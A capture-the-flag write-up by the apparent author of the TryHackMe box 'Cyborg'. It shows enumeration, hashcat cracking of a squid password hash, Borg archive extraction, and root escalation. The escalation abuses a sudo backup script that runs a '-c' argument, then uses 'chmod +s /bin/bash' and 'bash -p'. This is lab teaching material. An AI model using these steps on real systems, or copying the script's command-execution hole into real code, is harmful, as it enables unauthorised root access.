Recommended reads: oouch
Posts Cyborg Writeup(My box!)
Post
Cancel

Cyborg Writeup(My box!)

Cyborg was a box that I made for tryhackme. It involved Cracking a hash located on the web server. Then using those credentials we extracted a borg archive which then revealed credentials for ssh. running sudo -l revealed that there is a backup script running as a crontab. But we can also run the file ourself, source analysis showed that there is a custom parameter function which executes our command that we specify as root. There was also an unintended where i forgot to make the file owned by root so people could change the permissions of the file and append their own code, eg /bin/bash and then simply running the file (oopsie!). Either way i think both methods teach something. I might make another blog post going into detail on how i made the machine but i will come to that in the future.

Summary

  • Nmapping the box to find a website
  • A toggled download bar gives us a tar file
  • Extracting the tar file we find that it is a borg archive
  • Finding the directory of /etc by reading the comments in the admin section about the proxy
  • Cracking password hash
  • Extracing borg archive using the cracked hash
  • SSH access
  • Listing sudo rules
  • Exploiting file by appending custom parameter for reading root.txt

So lets get Straight into it!

User

As always we start off with an nmap scan for enumeration.

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/tryhackme/cyborg]
└─$ nmap -sC -sV -o nmap 10.10.148.94
Starting Nmap 7.91 ( [https://nmap.org](https://nmap.org/) ) at 2021-01-26 04:47 EST
Nmap scan report for 10.10.148.94
Host is up (0.027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 8.73 seconds

We can see that port 22 is open on ssh, 80 is also open for HTTP so lets check them out.

apache We can see that it is just the default Apache “It Works” page. lets dig deeper and start up a gobuster.

Gobuster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/tryhackme/cyborg]
└─$ gobuster dir -u http://10.10.148.94/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dirs.log                                                                                                                   1 ⨯
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.148.94/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/26 04:53:23 Starting gobuster
===============================================================
/admin (Status: 301)

We can see that it has revealed admin lets check that out.

/Admin

admin We see that is a landing page for a music producer. We check around and find a toggled download in archive. This lets us download an archive.tar file. We will save this for later.

shoutbox going over to the admins section we can see there is a shout box where people can message each other. They talk about a music archive but the most important part is the section on the squid proxy.

Squid is essentially just a proxy for http but we don’t need to look into this too much. They claim there is some config files laying about. So lets get googling and find out where these are located.

We find out they are located in /etc/squid/squid.conf , gobuster picks up the /etc directory aswell so this is an alternate method.

squid.conf

1
2
3
4
5
6
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users

We can see at the top line that it refers to a password file.

1
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

We see this is a hash so we go ahead and crack it.

Cracking hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
hash-identifier                                       
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

Possible Hashs:
[+] MD5(APR)

hash-identifier reveals that it is the format MD5(APR) we head over to hashcat examples and find the mode for this(1600). Hashcat cracking the hash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
hashcat --force -m 1600 -a 0 has /home/kali/rockyou.txt 
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 7 3700U with Radeon Vega Mobile Gfx, 1423/1487 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache built:
* Filename..: /home/kali/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward  
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Time.Started.....: Fri Jan  1 11:14:54 2021, (4 secs)
Time.Estimated...: Fri Jan  1 11:14:58 2021, (0 secs)
Guess.Base.......: File (/home/kali/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    12312 H/s (8.59ms) @ Accel:128 Loops:250 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 39424/14344385 (0.27%)
Rejected.........: 0/39424 (0.00%)
Restore.Point....: 38912/14344385 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidates.#1....: treetree -> cheery

Started: Fri Jan  1 11:13:59 2021
Stopped: Fri Jan  1 11:14:59 2021

So now we have credentials!

music_archive:squidward

We now head back over to the tar file and extract it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kalikali)-[~/tryhackme/cyborg]
└─$ tar -xvf archive.tar                                                                                                                                                                                                               2 
home/field/dev/final_archive/
home/field/dev/final_archive/hints.5
home/field/dev/final_archive/integrity.5
home/field/dev/final_archive/config
home/field/dev/final_archive/README
home/field/dev/final_archive/nonce
home/field/dev/final_archive/index.5
home/field/dev/final_archive/data/
home/field/dev/final_archive/data/0/
home/field/dev/final_archive/data/0/5
home/field/dev/final_archive/data/0/3
home/field/dev/final_archive/data/0/4
home/field/dev/final_archive/data/0/1

Borg

We see the files:

1
config  data  hints.5  index.5  integrity.5  nonce  README

README:

1
2
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

So we have a borg backup repo!

This is just a type of backup software for compression. I just happened to stumble across this on github and thought it was cool.

So their docs are https://borgbackup.readthedocs.io/ lets check them out!

We read the section on usage.

You can see that in the Usage section there is a section on extracting with the following command borg extract /path/to/repo::my-files

We can get our path to repo by doing pwd

as for the my-files part this seems to be the music_archive that was mentioned earlier and as the username for the hash.

So we can extract our archive now.(note the /path/to/archive might be different for everyone)

1
borg extract /path/to/archive::music_archive

Use the password squidward that we cracked earlier to do this.

And we get the files extracted!

Heading into home/alex/Documents we can see a note.txt

1
2
3
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

So now we have credentials!!!

We can ssh into the box as the user “alex”.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ssh alex@10.10.148.94                                                                                                                                                                                                              2 
The authenticity of host '10.10.148.94 (10.10.148.94)' can't be established.
ECDSA key fingerprint is SHA256:uB5ulnLcQitH1NC30YfXJUbdLjQLRvGhDRUgCSAD7F8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.148.94' (ECDSA) to the list of known hosts.
alex@10.10.148.94's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

27 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
alex@ubuntu:~$ cat user.txt
flag{************FLAG**************}

We have done user hooray!

Root

For root there was 2 methods, one due to a misconfiguration when I made the box but I thought it was still a cool method so I’m not patching it.

Intended

Running sudo -l shows that we can run a backup.sh file as sudo.

1
2
3
4
5
6
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

It is running as a cronjob every minute, If you ran linpeas you would see it being executed every minute.

1
2
alex@ubuntu:/etc/mp3backups$ ls
backed_up_files.txt  backup.sh  ubuntu-scheduled.tgz
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt

input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

while getopts c: flag
do
        case "${flag}" in 
                c) command=${OPTARG};;
        esac
done

backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd

We can see that it is performing a backup script on all the mp3 files in the users home directory.

However there is a certain part in this file that sticks out.

1
2
3
4
5
6
while getopts c: flag
do
        case "${flag}" in 
                c) command=${OPTARG};;
        esac
done

This function gets a parameter from the command line(-c) and at the end of the script executes it.

1
2
cmd=$($command)
echo $cmd

So lets gives this a test.

1
2
3
4
alex@ubuntu:/etc/mp3backups$ sudo /etc/mp3backups/backup.sh -c whoami
-------SNIP----------
Backup finished
root

And we can see its being ran as root! from here we can simply read the root flag if we wanted. But we havent compromised the system yet :( Lets get a shell!

We can do this by giving /bin/bash the SUID bit

1
sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"

Then we can run bash -p in the command line and we get a root shell!!!

1
2
3
4
5
alex@ubuntu:/etc/mp3backups$ bash -p
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
flag{***************FLAG***************}

Now this was the intended method

The unintended is by changing the permissions of the file to be writeable and then appending your own things.

1
Chmod 777 /etc/mp3backups/backup.sh
1
2
3
echo "chmod +s /bin/bash" > /etc/mp3backups/backup.sh
./backup.sh
bash -p

This also gives you a root shell. This can be owned by simply reading the root flag, or even getting a reverse shell if you want to. They both work.

Thanks for reading I hope you enjoyed my writeup. I had so much fun making this machine for the tryhackme communnity and I hope you enjoyed playing.

If you would like to support me you can buymeacoffee at the bottom right of your screen Or drop me a follow at my twitter https://twitter.com/fieldraccoon.

Thanks again. Fieldraccoon

This post is licensed under CC BY 4.0 by the author.